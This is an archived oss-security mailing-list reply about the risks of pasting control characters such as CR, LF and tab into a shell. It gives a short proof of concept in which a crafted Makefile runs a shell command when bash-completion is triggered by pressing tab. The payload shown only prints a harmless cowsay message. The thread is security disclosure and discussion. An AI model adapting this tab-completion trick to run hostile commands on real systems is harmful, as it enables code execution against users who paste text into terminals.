[prev in list] [next in list] [prev in thread] [next in thread] 

List:       oss-security
Subject:    Re: [oss-security] Re: Terminal Control Chars
From:       Jakub Wilk <jwilk () jwilk ! net>
Date:       2018-04-16 8:15:00
Message-ID: 20180416081500.4dnup7bk3g6vkkaa () jwilk ! net
[Download RAW message or body]

* David A. Wheeler <dwheeler@dwheeler.com>, 2018-04-12, 17:18:
>Russ Allbery:
>>I think a useful definition of "control character" in this context 
>>(and I realize this doesn't exactly match the ASCII definition) is a 
>>character that results in an action other than insertion being 
>>taken... CR and LF would not be control characters in that definition, 
>>since they insert a newline and don't cause an action. Similarly, TAB 
>>wouldn't be a control character in that definition.
>
>As you noted, that definition doesn't match the ASCII definition, but I 
>also think it's misleading.  If someone pastes a CR/LF into a shell 
>prompt, it certainly *DOES* cause an action,

Similarly, tab is an "active" character in most shells.

In the worst case (the victim uses bash with bash-completion installed, 
and the attacker has write access to the victim's filesystem), pasting 
tab can be as bad as pasting LF.

Here's a proof of concept:

   $ printf 'x := $(shell (echo; cowsay pwned)>/dev/tty)' > moo
   $ make -f moo <tab>
    _______
   < pwned >
    -------
           \   ^__^
            \  (oo)\_______
               (__)\       )\/\
                   ||----w |
                   ||     ||

Credit for discovering this goes to Dan Rosenberg:
https://twitter.com/djrbliss/status/699363006946344963

-- 
Jakub Wilk
[prev in list] [next in list] [prev in thread] [next in thread]